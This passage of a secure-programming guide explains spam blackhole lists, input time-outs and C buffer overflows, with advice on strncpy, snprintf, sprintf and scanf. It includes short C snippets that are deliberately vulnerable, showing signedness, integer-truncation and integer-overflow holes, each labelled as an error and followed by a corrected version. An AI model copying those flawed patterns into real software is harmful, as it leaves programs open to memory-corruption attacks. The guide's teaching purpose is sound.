||
The usual way to use the RBL is to simply refuse to accept any requests
|
||
from IP addresses in the blackhole list;
|
||
this is harsh, but it solves the problem.
|
||
Another similar service is the Open Relay Database (ORDB) at
|
||
<ulink url="http://ordb.org">http://ordb.org</ulink>, which identifies
|
||
dynamically those sites that permit open email relays
|
||
(open email relays are misconfigured email servers that allow spammers to
|
||
send email through them).
|
||
Another location for more information is
|
||
<ulink url="http://www.spews.org">SPEWS</ulink>.
|
||
I believe there are other similar services as well.
|
||
</para>
|
||
<para>
|
||
I suggest that many systems and programs,
|
||
by default, enable spam blocking if they
|
||
can send email on to others whose identity is under control
|
||
of a remote user - and that includes MTAs.
|
||
At the least, consider this.
|
||
There are real problems with this suggestion, of course -
|
||
you might (rarely) inhibit communication with a legitimate user.
|
||
On the other hand, if you don't block spam, then it's likely that everyone
|
||
<emphasis>else</emphasis> will blackhole your system
|
||
(and thus ignore your emails).
|
||
It's not a simple issue, because no matter what you do, some people
|
||
will not allow you to send them email.
|
||
And of course, how well do you trust the organization keeping up the
|
||
real-time blackhole list - will they add truly innocent sites to the
|
||
blackhole list, and will they remove sites from the blackhole list
|
||
once all is okay?
|
||
Thus, it becomes a trade-off - is it more important to talk to spammers
|
||
(and a few innocents as well), or is it more important to talk to
|
||
those many other systems with spam blocks
|
||
(losing those innocents who share equipment with spammers)?
|
||
Obviously, this must be configurable.
|
||
This is somewhat controversial advice, so consider your options for
|
||
your circumstance.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="limit-time">
|
||
<title>Limit Valid Input Time and Load Level</title>
|
||
|
||
<para>
|
||
Place time-outs and load level limits, especially on incoming network data.
|
||
Otherwise, an attacker might be able to easily cause a denial of service
|
||
by constantly requesting the service.
|
||
</para>
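<para>
One common way to place a time-out on incoming data is to wait with
select(2) before calling read(2).
The following is a minimal sketch under that assumption; the function name
read_with_timeout() and its return convention are hypothetical.
It bounds a single wait only, so a complete service would still need an
overall deadline and a limit on the number of simultaneous requests.
</para>

```c
#include <stddef.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: wait at most `seconds` for data on fd, then read
   up to count bytes. Returns the read(2) result, or -2 if fd is out of
   range for select(2), no data arrived in time, or select(2) failed. */
ssize_t read_with_timeout(int fd, void *buf, size_t count, int seconds)
{
    fd_set readfds;
    struct timeval tv;

    /* FD_SET() does not check its index, so check it here. */
    if (fd < 0 || fd >= FD_SETSIZE)
        return -2;

    FD_ZERO(&readfds);
    FD_SET(fd, &readfds);
    tv.tv_sec = seconds;
    tv.tv_usec = 0;

    /* select() returns 0 on time-out and -1 on error. */
    if (select(fd + 1, &readfds, NULL, NULL, &tv) <= 0)
        return -2;

    return read(fd, buf, count);
}
```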
|
||
|
||
</sect1>
|
||
|
||
</chapter>
|
||
|
||
<chapter id="buffer-overflow">
|
||
<title>Avoid Buffer Overflow</title>
|
||
|
||
<epigraph>
|
||
<attribution>Amos 3:11 (NIV)</attribution>
|
||
<para>
|
||
An enemy will overrun the land;
|
||
he will pull down your strongholds and
|
||
plunder your fortresses.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
An extremely common security flaw is vulnerability to a ``buffer overflow''.
|
||
Buffer overflows are also called ``buffer overruns'', and there are
|
||
many kinds of buffer overflow attacks (including
|
||
``stack smashing'' and ``heap smashing'' attacks).
|
||
Technically, a buffer overflow is a problem with the program's internal
|
||
implementation, but it's such a common and serious problem that
|
||
I've placed this information in its own chapter.
|
||
To give you an idea of how important this subject is,
|
||
at the CERT, 9 of 13 advisories in 1998 and at least half of
|
||
the 1999 advisories involved buffer overflows.
|
||
An informal 1999 survey on Bugtraq found that approximately 2/3 of the
|
||
respondents felt that buffer overflows were the leading cause of
|
||
system security vulnerability (the remaining respondents identified
|
||
``mis-configuration'' as the leading cause) [Cowan 1999].
|
||
This is an old, well-known problem, yet it continues to resurface
|
||
[McGraw 2000].
|
||
<!-- ???: Get the stats from the libsafe paper -->
|
||
</para>
|
||
|
||
<para>
|
||
A buffer overflow occurs when you write a set of values
|
||
(usually a string of characters) into a fixed length buffer
|
||
and write at least one value outside that buffer's boundaries
|
||
(usually past its end).
|
||
A buffer overflow can occur when reading input from the user into a buffer,
|
||
but it can also occur during other kinds of processing in a program.
|
||
</para>
|
||
|
||
<para>
|
||
If a secure program permits a buffer overflow, the overflow can often be
|
||
exploited by an adversary.
|
||
If the buffer is a local C variable, the overflow can be used to
|
||
force the function to run code of an attacker's choosing.
|
||
This specific variation is often called a ``stack smashing'' attack.
|
||
A buffer in the heap isn't much better; attackers may be able to
|
||
use such overflows to control other variables in the program.
|
||
More details can be found from Aleph1 [1996], Mudge [1995], LSD [2001],
|
||
or Nathan P. Smith's
|
||
"Stack Smashing Security Vulnerabilities" website at
|
||
<ulink
|
||
url="http://destroy.net/machines/security/">http://destroy.net/machines/security/</ulink>.
|
||
A discussion of the problem and some ways to counter it is given
|
||
by Crispin Cowan et al, 2000, at
|
||
<ulink url="http://immunix.org/StackGuard/discex00.pdf">
|
||
http://immunix.org/StackGuard/discex00.pdf</ulink>.
|
||
<!--
|
||
Buffer Overflows:
|
||
Attacks and Defenses for the Vulnerability of the Decade.
|
||
Crispin Cowan, Perry Wagle, Calton Pu,
|
||
Steve Beattie, and Jonathan Walpole
|
||
Department of Computer Science and Engineering
|
||
Oregon Graduate Institute of Science & Technology
|
||
|
||
It appeared at the DARPA DISCEX conference
|
||
http://schafercorp-ballston.com/discex, and again as an invited talk
|
||
at the SANS 2000 conference http://www.sans.org/sans2000/sans2000.htm
|
||
|
||
-->
|
||
A discussion of the problem and some ways to counter it in Linux
|
||
is given by
|
||
Pierre-Alain Fayolle and Vincent Glaume
|
||
at
|
||
<ulink url="http://www.enseirb.fr/~glaume/indexen.html">
|
||
http://www.enseirb.fr/~glaume/indexen.html</ulink>.
|
||
<!-- A Buffer Overflow Study
|
||
Attacks & Defenses
|
||
-->
|
||
<!--
|
||
|
||
On Bugtraq:
|
||
Subject: Re: A buffer overflow study - generic protections
|
||
From: Crispin Cowan <crispin@wirex.com>
|
||
Date: Tue, 02 Apr 2002 14:02:15 -0800
|
||
To: bugtraq@securityfocus.com
|
||
|
||
The similarities [of these two papers]
|
||
are substantial: we also categorized the attack space
|
||
(kinds of buffer overflows), surveyed the defenses, and considered
|
||
optimal combinations of defenses to get good coverage at reasonable
|
||
cost. Differences:
|
||
|
||
* Our survey was much broader. We covered:
|
||
* Non-executable buffers (i.e. Solar Designer's non-executable
|
||
stack patch, and a similar feature in Solaris)
|
||
* Array bunds checking (Compaq's ccc compiler, and the bounds
|
||
checking GCC built by Jones & Kelly and maintained by Herman
|
||
ten Brugge, Purify, and type safe languages such as Java)
|
||
* Code pointer integrity checking (StackGuard, and the
|
||
hand-coded stack introspection that Snarskii built into
|
||
FreeBSD's libc)
|
||
* We did not cover:
|
||
* libsafe: it did not exist at the time
|
||
* grsecurity: it is just a derivative of Solar Designer's work
|
||
* PAX: it did not exist at the time
|
||
* Prelude: I don't understand how a general purpose host
|
||
intrusion detection system bears on a survey of buffer overflows
|
||
* Stack Shield: it is just a weak immitation of StackGuard,
|
||
with no advantages, and substantial disadvantages
|
||
* We came to a somewhat similar conclusion: that a combination of
|
||
tools was the ideal defense. However, our preferred combo was
|
||
StackGuard + Solar Designer's non-executable stack patch, which is
|
||
what we actually ship in Immunix.
|
||
* StackGuard offers the best resistance to "stack smashing"
|
||
attacks
|
||
* Non-executable stack segments offer substantial resistance
|
||
to code injection (payload)
|
||
* The two techniques are transparently compatible, and the
|
||
combined performance overhead is nearly zero
|
||
* As above, we did not consider PAX, but we would still not recomend
|
||
it for most applications: the 10% macrobenchmark performance hit
|
||
is pretty high.
|
||
* We are mystified why Vincent et al recomend Stack Shield instead
|
||
of StackGuard: Stack Shield offers no advantages (it is not more
|
||
secure and it is not faster) and is much more problematic to deploy.
|
||
* Libsafe vs. StackGuard or Stack Shield is a true decision: Libsafe
|
||
is incompatible with compiler techniques that munge the call stack
|
||
(and incompatible with -fno-frame-pointer) so you have to choose
|
||
one or the other
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
Most high-level programming languages are essentially
|
||
immune to this problem, either
|
||
because they automatically resize arrays (e.g., Perl), or because they normally
|
||
detect and prevent buffer overflows (e.g., Ada95).
|
||
However, the C language provides no protection against
|
||
such problems, and C++ can be easily used in ways to cause this problem too.
|
||
Assembly language also provides no protection, and some languages
|
||
that normally include such protection (e.g., Ada and Pascal) can have
|
||
this protection disabled (for performance reasons).
|
||
Even if most of your program is written in another language,
|
||
many library routines are written in C or C++, as well as ``glue'' code to
|
||
call them, so other languages often don't provide as complete a protection
|
||
from buffer overflows as you'd like.
|
||
</para>
|
||
|
||
<sect1 id="dangers-c">
|
||
<title>Dangers in C/C++</title>
|
||
|
||
<para>
|
||
C users must avoid using dangerous functions that do not check bounds
|
||
unless they've ensured that the bounds will never get exceeded.
|
||
Functions to avoid in most cases (or ensure protection) include
|
||
the functions strcpy(3), strcat(3), sprintf(3)
|
||
(with cousin vsprintf(3)), and gets(3).
|
||
These should be replaced with functions such as strncpy(3), strncat(3),
|
||
snprintf(3), and fgets(3) respectively, but see the discussion below.
|
||
The function strlen(3) should be avoided unless you can ensure that there
|
||
will be a terminating NIL character to find.
|
||
The scanf() family (scanf(3), fscanf(3), sscanf(3), vscanf(3),
|
||
vsscanf(3), and vfscanf(3)) is often dangerous to use; do not use it
|
||
to send data to a string without controlling the maximum length
|
||
(the format %s is a particularly common problem).
|
||
Other dangerous functions that may permit buffer overruns (depending on their
|
||
use) include
|
||
realpath(3), getopt(3), getpass(3),
|
||
streadd(3), strecpy(3), and strtrns(3).
|
||
You must be careful with getwd(3); the buffer sent to getwd(3) must be
|
||
at least PATH_MAX bytes long.
|
||
The select(2) helper macros
|
||
FD_SET(), FD_CLR(), and FD_ISSET() do not check that the index fd
|
||
is within bounds; make sure that fd >= 0 and fd < FD_SETSIZE
|
||
(this particular one has been exploited in pppd).
|
||
</para>
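<para>
As an illustration of controlling the maximum length with the scanf()
family, the following sketch gives the %s conversion an explicit field width.
The names first_word() and WORD_MAX are hypothetical, and the width in the
format string (15) must be kept equal to WORD_MAX - 1 by hand, since the
format cannot see the macro.
</para>

```c
#include <stdio.h>

#define WORD_MAX 16   /* buffer size, including the terminating NIL */

/* Hypothetical helper: copy the first whitespace-delimited word of line
   into word, which must have room for WORD_MAX bytes. The field width
   15 is WORD_MAX - 1, which leaves room for the terminator that
   sscanf() appends. Returns 1 if a word was stored, 0 otherwise. */
int first_word(const char *line, char word[WORD_MAX])
{
    return sscanf(line, "%15s", word) == 1;
}
```

<para>
A longer word is cut off at 15 characters instead of overrunning the buffer;
a program that must reject over-long input rather than truncate it needs an
additional check.
</para>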
|
||
|
||
<para>
|
||
Unfortunately, snprintf()'s variants have additional problems.
|
||
Officially, snprintf() is not a standard C function in the ISO 1990
|
||
(ANSI 1989) standard, though sprintf() is,
|
||
so not all systems include snprintf().
|
||
Even worse, some systems' snprintf() do not actually protect
|
||
against buffer overflows; they just call sprintf directly.
|
||
Old versions of Linux's libc4 depended on a ``libbsd'' that did this
|
||
horrible thing, and I'm told that some old HP systems did the same.
|
||
Linux's current version of snprintf is known to work correctly, that is, it
|
||
does actually respect the boundary requested.
|
||
The return value of snprintf() varies as well;
|
||
the Single Unix Specification (SUS) version 2
|
||
and the C99 standard differ on what is returned by snprintf().
|
||
Finally, it appears that at least some versions of
|
||
snprintf don't guarantee that its string will end in NIL; if the
|
||
string is too long, it won't include NIL at all.
|
||
Note that the glib library (the basis of GTK, and not the same as the
|
||
GNU C library glibc) has a g_snprintf(), which
|
||
has a consistent return semantic, always NIL-terminates, and
|
||
most importantly always respects the buffer length.
|
||
<!-- libsafe protects:
|
||
[vf]scanf(const char *format, ...)
|
||
May overflow its arguments.
|
||
realpath(char *path, char resolved_path[])
|
||
May overflow the path buffer.
|
||
[v]sprintf(char *str, const char *format, ...)
|
||
May overflow the str buffer.
|
||
-->
|
||
</para>
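<para>
Given these variations, a cautious caller can check the result of snprintf()
and terminate the buffer itself.
The sketch below assumes a C99-conforming snprintf(), which returns the
length the complete result would have had; the function name format_pair()
is hypothetical.
On a system whose snprintf() follows different return rules, the truncation
test would need to be adapted.
</para>

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: format "name=value" into buf of size bufsize.
   Assumes C99 snprintf() return semantics.
   Returns 0 on success, -1 on error or truncation. */
int format_pair(char *buf, size_t bufsize, const char *name, const char *value)
{
    int n;

    if (bufsize == 0)
        return -1;

    n = snprintf(buf, bufsize, "%s=%s", name, value);

    /* Defensive: some old versions do not terminate on truncation. */
    buf[bufsize - 1] = '\0';

    /* A result of bufsize or more means the output did not fit. */
    if (n < 0 || (size_t)n >= bufsize)
        return -1;
    return 0;
}
```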
|
||
|
||
<para>
|
||
Of course, the problem is more than just calling string functions poorly.
|
||
Here are a few additional examples of types of buffer overflow problems,
|
||
graciously suggested by Timo Sirainen, involving manipulation of
|
||
numbers to cause buffer overflows.
|
||
<!-- http://irccrew.org/~cras/security/flaws.html -->
|
||
</para>
|
||
|
||
<para>
|
||
First, there's the problem of signedness.
|
||
If you read data that affects the buffer size,
|
||
such as the "number of characters to be read,"
|
||
be sure to check whether the number is less than zero (or less than one).
|
||
Otherwise, the negative number may be cast to an unsigned number,
|
||
and the resulting large positive number
|
||
may then permit a buffer overflow problem.
|
||
Note that sometimes an attacker can provide a large positive number and
|
||
have the same thing happen;
|
||
in some cases, the large value will be interpreted as a negative number
|
||
(slipping by the check for large numbers if there's no check
|
||
for a less-than-one value),
|
||
and then be interpreted later into a large positive value.
|
||
|
||
<programlisting>
|
||
<![CDATA[
|
||
/* 1) signedness - DO NOT DO THIS. */
|
||
char *buf;
|
||
int i, len;
|
||
|
||
read(fd, &len, sizeof(len));
|
||
|
||
/* OOPS! We forgot to check for < 0 */
|
||
if (len > 8000) { error("too large length"); return; }
|
||
|
||
buf = malloc(len);
|
||
read(fd, buf, len); /* len is cast to unsigned and the buffer overflows */
|
||
]]>
|
||
</programlisting>
|
||
</para>
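<para>
A corrected version of the signedness example might look like the following
sketch.
The function name read_block() and the MAX_LEN macro are hypothetical; the
limit of 8000 is taken from the example above.
The essential change is that the length is rejected when it is below one as
well as when it is too large, and that the results of read() and malloc()
are checked.
</para>

```c
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define MAX_LEN 8000   /* same limit as in the flawed example */

/* Hypothetical corrected version: read a length, then that many bytes.
   Returns a malloc()ed buffer and stores its length in *out_len,
   or returns NULL on any error. */
char *read_block(int fd, int *out_len)
{
    char *buf;
    int len;

    if (read(fd, &len, sizeof(len)) != (ssize_t)sizeof(len))
        return NULL;

    /* Reject lengths below one as well as lengths that are too large. */
    if (len < 1 || len > MAX_LEN)
        return NULL;

    buf = malloc((size_t)len);
    if (buf == NULL)
        return NULL;

    /* A short read is treated as an error in this sketch. */
    if (read(fd, buf, (size_t)len) != (ssize_t)len) {
        free(buf);
        return NULL;
    }

    *out_len = len;
    return buf;
}
```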
|
||
|
||
<para>
|
||
Here's a second example identified by Timo Sirainen,
|
||
involving integer size truncation.
|
||
Sometimes the different sizes of integers
|
||
can be exploited to cause a buffer overflow.
|
||
Basically, make sure that you don't truncate any integer results used to
|
||
compute buffer sizes.
|
||
Here's Timo's example for 64-bit architectures:
|
||
|
||
<!--
|
||
, showing two cases of this problem - one
|
||
for 32 bit architectures with large file support
|
||
(where the offset values are 64 bits), and another for 64-bit architectures.
|
||
<programlisting>
|
||
/* For 32bit architectures with large file support: */
|
||
|
||
char *buf;
|
||
off_t len;
|
||
|
||
read(fd, &len, sizeof(len));
|
||
|
||
/* we're relying on malloc() to fail with too large values */
|
||
if (len <= 0) { error("invalid length"); return; }
|
||
|
||
/* 64bit off_t gets truncated to 32bit size_t */
|
||
buf = malloc(len);
|
||
read(fd, buf, len);
|
||
-->
|
||
|
||
<programlisting>
|
||
<![CDATA[
|
||
/* An example of an ERROR for some 64-bit architectures,
|
||
if "unsigned int" is 32 bits and "size_t" is 64 bits: */
|
||
|
||
void *mymalloc(unsigned int size) { return malloc(size); }
|
||
|
||
char *buf;
|
||
size_t len;
|
||
|
||
read(fd, &len, sizeof(len));
|
||
|
||
/* we forgot to check the maximum length */
|
||
|
||
/* 64-bit size_t gets truncated to 32-bit unsigned int */
|
||
buf = mymalloc(len);
|
||
read(fd, buf, len);
|
||
]]>
|
||
</programlisting>
|
||
</para>
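<para>
One way to avoid the truncation is to refuse any length that cannot be
represented in the narrower type.
This is a sketch only; mymalloc() is repeated from the example above so that
the fragment is complete, and the wrapper name mymalloc_checked() is
hypothetical.
A real program should normally also impose a much smaller application-specific
maximum.
</para>

```c
#include <limits.h>
#include <stddef.h>
#include <stdlib.h>

/* Same narrow interface as in the flawed example. */
void *mymalloc(unsigned int size) { return malloc(size); }

/* Hypothetical wrapper: refuse any length that would not survive the
   conversion to unsigned int, instead of silently truncating it.
   Where size_t and unsigned int have the same width, the upper
   comparison is simply never true. */
void *mymalloc_checked(size_t len)
{
    if (len == 0 || len > UINT_MAX)
        return NULL;
    return mymalloc((unsigned int)len);
}
```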
|
||
|
||
<para>
|
||
Here's a third example from Timo Sirainen, involving integer overflow.
|
||
This is particularly nasty when combined with malloc(); an attacker
|
||
may be able to create a situation where the computed buffer size
|
||
is less than the data to be placed in it.
|
||
Here is Timo's sample:
|
||
<programlisting>
|
||
<![CDATA[
|
||
/* 3) integer overflow */
|
||
char *buf;
|
||
size_t len;
|
||
|
||
read(fd, &len, sizeof(len));
|
||
|
||
/* we forgot to check the maximum length */
|
||
|
||
buf = malloc(len+1); /* +1 can overflow to malloc(0) */
|
||
read(fd, buf, len);
|
||
buf[len] = '\0';
|
||
]]>
|
||
</programlisting>
|
||
</para>
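<para>
The overflow can be prevented by checking the length before adding to it.
The following sketch assumes a C99 compiler (for SIZE_MAX);
the function name alloc_with_terminator() and its max_len parameter are
hypothetical.
</para>

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical helper: allocate len bytes plus one for a terminator.
   Returns NULL if len exceeds max_len or if len + 1 would wrap around
   to zero. */
char *alloc_with_terminator(size_t len, size_t max_len)
{
    if (len > max_len || len == SIZE_MAX)
        return NULL;
    return malloc(len + 1);
}
```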
|
||
</sect1>
|
||
|
||
<sect1 id="library-c">
|
||
<title>Library Solutions in C/C++</title>
|
||
|
||
<para>
|
||
One partial solution in C/C++ is to use library functions that do not have
|
||
buffer overflow problems.
|
||
The first subsection describes the ``standard C library'' solution, which
|
||
can work but has its disadvantages.
|
||
The next subsection describes the general security issues of both
|
||
fixed length and dynamically reallocated approaches to buffers.
|
||
The following subsections describe various alternative libraries,
|
||
such as strlcpy and libmib.
|
||
Note that these don't solve all problems; you still have to code
|
||
extremely carefully in C/C++ to avoid all buffer overflow situations.
|
||
</para>
|
||
|
||
<sect2 id="buffer-standard-solution">
|
||
<title>Standard C Library Solution</title>
|
||
|
||
<para>
|
||
The ``standard'' solution to prevent buffer overflow in C
|
||
(which is also used in some C++ programs)
|
||
is to use the standard C library calls that defend against these problems.
|
||
This approach depends heavily on the standard library functions
|
||
strncpy(3) and strncat(3).
|
||
If you choose this approach, beware: these calls have somewhat surprising
|
||
semantics and are hard to use correctly.
|
||
The function strncpy(3) does not NIL-terminate the destination string
|
||
if the source string length is at least equal to the destination's, so
|
||
be sure to set the last character of the destination string to NIL after
|
||
calling strncpy(3).
|
||
If you're going to reuse the same buffer many times,
|
||
an efficient approach is to tell strncpy() that the buffer is one
|
||
character shorter than it actually is and set the last character to
|
||
NIL once before use.
|
||
Both strncpy(3) and strncat(3) require that you pass
|
||
the amount of space left available, a computation
|
||
that is easy to get wrong (and getting it wrong could permit a
|
||
buffer overflow attack).
|
||
Neither provides a simple mechanism to determine whether an overflow has occurred.
|
||
Finally, strncpy(3) has a significant performance penalty compared
|
||
to the strcpy(3) it supposedly replaces,
|
||
because <emphasis remap="it">strncpy(3) NIL-fills the remainder of the destination</emphasis>.
|
||
I've gotten emails expressing surprise over this last point, but this is
|
||
clearly stated in Kernighan and Ritchie second edition
|
||
[Kernighan 1988, page 249], and this behavior is clearly documented in
|
||
the man pages for Linux, FreeBSD, and Solaris.
|
||
This means that just changing from strcpy to strncpy can cause a severe
|
||
reduction in performance, for no good reason in most cases.
|
||
</para>
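<para>
The termination rule described above can be sketched as follows.
The function name copy_fixed() is a hypothetical helper, not part of any
library; it simply shows strncpy(3) being told that the buffer is one
character shorter than it is, followed by an explicit NIL.
<programlisting>
<![CDATA[
```c
#include <string.h>

/* Copy src into dst, whose capacity is dstsize bytes.
   Returns 1 if the whole string fit, 0 if it was truncated
   (or if dstsize is 0, in which case nothing is written). */
int copy_fixed(char *dst, size_t dstsize, const char *src)
{
    if (dstsize == 0)
        return 0;
    strncpy(dst, src, dstsize - 1);  /* also NIL-fills any unused tail */
    dst[dstsize - 1] = '\0';         /* strncpy may not have terminated */
    return strlen(src) < dstsize;
}
```
]]>
</programlisting>
Note that the truncation test has to be written by hand, since
strncpy(3) itself does not report it.
</para>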
|
||
|
||
<para>
|
||
Warning!!
|
||
The function strncpy(s1, s2, n) can also be used as
|
||
a way of copying only part of s2, where n is less than strlen(s2).
|
||
When used this way, strncpy() basically provides no protection against
|
||
buffer overflow by itself - you have to take
|
||
separate actions to ensure that n is smaller than the buffer of s1.
|
||
Also, when used this way, strncpy() does not add a trailing NIL
after copying n characters.
|
||
This makes it harder to determine if a program using strncpy() is secure.
|
||
</para>
|
||
|
||
<para>
|
||
<!-- from Hudin Lucian, BUGTRAQ - 29 Jun 2000 -->
|
||
<!-- David A. Wheeler checked it and found that it was WRONG - 18 July 2000 -->
|
||
<!-- Sean Winn reaffirmed this 28 Oct 2000. Wheeler rechecked, and found
|
||
that his code was wrong. Text here was rewritten as a result. -->
|
||
You can also use sprintf() while preventing
|
||
buffer overflows, but you need to be careful when doing so;
|
||
it's so easy to misapply that it's hard to recommend.
|
||
The sprintf control string can contain various conversion specifiers
|
||
(e.g., "%s"), and the control specifiers can have optional
|
||
field width (e.g., "%10s") and precision (e.g., "%.10s") specifications.
|
||
These look quite similar (the only difference is a period)
|
||
but they are very different.
|
||
The field width only
|
||
specifies a <emphasis>minimum</emphasis> length and is
|
||
completely worthless for preventing buffer overflows.
|
||
In contrast, the precision specification specifies the maximum
|
||
length that the particular string may have in its output when
|
||
used as a string conversion specifier - and thus it can be used
|
||
to protect against buffer overflows.
|
||
Note that the precision specification only specifies the total maximum
|
||
length when dealing with a string; it has a different meaning for
|
||
other conversion operations.
|
||
If the size is given as a precision of "*", then you can pass the maximum size
as a parameter of type int (e.g., the result of a sizeof() operation, cast to int).
|
||
This is most easily shown by an example - here's the wrong and right
|
||
way to use sprintf() to protect against buffer overflows:
|
||
<programlisting width="61">
|
||
char buf[BUFFER_SIZE];
|
||
 sprintf(buf, "%*s",  (int)(sizeof(buf)-1), "long-string");  /* WRONG */
 sprintf(buf, "%.*s", (int)(sizeof(buf)-1), "long-string");  /* RIGHT */
|
||
</programlisting>
|
||
In theory, sprintf() should be very helpful because you can use it
|
||
to specify complex formats.
|
||
Sadly, it's easy to get things wrong with sprintf().
|
||
If the format is complex, you
|
||
need to make sure that the destination is large enough for the largest
|
||
possible size of the <emphasis>entire</emphasis>
|
||
format, but the precision field only controls
|
||
the size of one parameter.
|
||
The "largest possible" value is often hard to determine when a
|
||
complicated output is being created.
|
||
If a program doesn't allocate quite enough space for the longest possible
|
||
combination, a buffer overflow vulnerability may open up.
|
||
Also, sprintf() appends a NIL to the destination
|
||
after the entire operation is complete -
|
||
this extra character is easy to forget and creates an opportunity
|
||
for off-by-one errors.
|
||
So, while this works, it can be painful to use in some circumstances.
|
||
</para>
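<para>
As a small illustration of sizing the destination for the
<emphasis>entire</emphasis> format, here is a sketch in which the buffer
size is derived from the fixed text plus the precision limit.
The names format_user(), NAME_SHOWN, and LINE_SIZE are assumptions made
up for this example.
<programlisting>
<![CDATA[
```c
#include <stdio.h>

#define NAME_SHOWN 20                    /* hypothetical per-field limit */
#define LINE_SIZE  (5 + NAME_SHOWN + 1)  /* "user=" + name + NIL */

/* Write "user=" followed by at most NAME_SHOWN characters of name. */
void format_user(char line[LINE_SIZE], const char *name)
{
    /* The precision caps the %s conversion at NAME_SHOWN characters;
       the argument consumed by '*' must have type int. */
    sprintf(line, "user=%.*s", (int)NAME_SHOWN, name);
}
```
]]>
</programlisting>
If the format string is later changed (say, a longer prefix is used),
LINE_SIZE must be recomputed by hand, which is exactly the kind of
bookkeeping that makes this approach fragile.
</para>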
|
||
<para>
|
||
Also, a quick note about the code above - note that the sizeof()
|
||
operation used the size of an array.
|
||
If the code were changed so that ``buf'' was a pointer to some
|
||
allocated memory, then all ``sizeof()'' operations would have to be
|
||
changed (or sizeof would just measure the size of a pointer, which isn't
|
||
enough space for most values).
|
||
</para>
|
||
|
||
<para>
|
||
The scanf() family is sadly a little murky as well.
|
||
An obvious question is whether or not the maximum width value can
|
||
be used in %s to prevent these attacks.
|
||
There are multiple official specifications for scanf();
|
||
some clearly state that the width parameter is the absolutely largest
|
||
number of characters, while others aren't as clear.
|
||
<!-- IEEE Std 1003.1-2001 is clear that max widths must be implemented,
|
||
http://www.opengroup.org/onlinepubs/007904975/functions/scanf.html;
|
||
the Single Unix Spec is much less clear. -->
|
||
The biggest problem is implementations; modern implementations
|
||
that I know of do support maximum widths, but I cannot say with
|
||
certainty that all libraries properly implement maximum widths.
|
||
The safest approach is to do things yourself in such cases.
|
||
However, few will fault you if you simply use scanf and include the
widths in the format strings
(but remember that the width does not count the terminating \0, so the
buffer must be at least one byte larger than the width).
|
||
If you do use scanf, it's best to include a test in your installation
|
||
scripts to ensure that the library properly limits length.
|
||
|
||
</para>
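<para>
Here is a minimal sketch of a width-limited string conversion, using
sscanf() so that it can be tried without any input file.
The names first_word() and WORD_MAX are hypothetical; note that the
width written in the format string has to be kept in step with
WORD_MAX by hand.
<programlisting>
<![CDATA[
```c
#include <stdio.h>

#define WORD_MAX 15   /* hypothetical limit; must match the "%15s" below */

/* Store the first whitespace-delimited word of input in word.
   Returns 1 on success, 0 if no word was found. */
int first_word(const char *input, char word[WORD_MAX + 1])
{
    /* "%15s" stores at most 15 characters and then a terminating NIL,
       so the buffer needs WORD_MAX + 1 bytes. */
    return sscanf(input, "%15s", word) == 1;
}
```
]]>
</programlisting>
A test like this one, run at installation time, is one way to check
that the library really does limit the length.
</para>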
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="static-vs-dynamic-buffers">
|
||
<title>Static and Dynamically Allocated Buffers</title>
|
||
|
||
<para>
|
||
Functions such as strncpy
|
||
are useful for dealing with statically allocated buffers.
|
||
This is a programming approach where a buffer is allocated for
|
||
the ``longest useful size'' and then it stays a fixed size from then on.
|
||
The alternative is to dynamically reallocate buffer sizes as you need them.
|
||
It turns out that both approaches have security implications.
|
||
</para>
|
||
|
||
<para>
|
||
<!-- Thanks to Ryan McCabe (thanks.odin@numb.org) for the comment
|
||
that fixed-length buffers have their own exploitable problems. -->
|
||
There is a general security problem when using fixed-length buffers: the fact
|
||
that the buffer is a fixed length may be exploitable.
|
||
This is a problem with strncpy(3) and strncat(3), snprintf(3),
|
||
strlcpy(3), strlcat(3), and other such functions.
|
||
The basic idea is that the attacker sets up a really long string so that,
|
||
when the string is truncated, the final result will be what the
|
||
attacker wanted (instead of what the developer intended).
|
||
Perhaps the string is concatenated from several smaller
|
||
pieces; the attacker might make the first piece as long as the entire
|
||
buffer, so all later attempts to concatenate strings do nothing.
|
||
Here are some specific examples:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
Imagine code that calls gethostbyname(3) and, if
|
||
successful, immediately copies hostent->h_name to a
|
||
fixed-size buffer using strncpy or snprintf.
|
||
Using strncpy or snprintf protects against an overflow of an excessively
|
||
long fully-qualified domain name (FQDN), so you might think you're done.
|
||
However, this could result in chopping off the end of the FQDN.
|
||
This may be very undesirable, depending on what happens next.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Imagine code that uses strncpy, strncat, snprintf, etc., to copy the
|
||
full path of a filesystem object to some buffer.
|
||
Further imagine that the original value was provided by an
|
||
untrusted user, and that the copying is part of a process to pass a
|
||
resulting computation to a function.
|
||
Sounds safe, right?
|
||
Now imagine that an attacker pads a path
|
||
with a large number of '/'s at the beginning. This could
|
||
result in future operations being performed on the file ``/''.
|
||
If the program appends values in the belief that the result will be safe,
|
||
the program may be exploitable.
|
||
Or, the attacker could devise a long filename near the buffer length, so that
|
||
attempts to append to the filename would silently fail to occur
|
||
(or only partially occur in ways that may be exploitable).
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
When using statically-allocated buffers,
|
||
you really need to consider the length of the source and destination arguments.
|
||
Sanity checking the input and the resulting intermediate computation might
|
||
deal with this, too.
|
||
</para>
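<para>
One way to apply this advice is to treat truncation as an error instead
of silently continuing with a shortened value.
The sketch below assumes a C99-conforming snprintf(3), which returns the
length the full result would have had; join_path() is a hypothetical
helper name.
<programlisting>
<![CDATA[
```c
#include <stdio.h>

/* Build "dir/name" in dst, whose capacity is dstsize bytes.
   Returns 0 on success.  Returns -1 if the result would not fit; in
   that case dst is set to the empty string, not to a truncated path. */
int join_path(char *dst, size_t dstsize, const char *dir, const char *name)
{
    int n;

    if (dstsize == 0)
        return -1;
    n = snprintf(dst, dstsize, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= dstsize) {
        dst[0] = '\0';
        return -1;
    }
    return 0;
}
```
]]>
</programlisting>
The caller must still check the return value; the point is only that a
path which does not fit is never passed on in shortened form.
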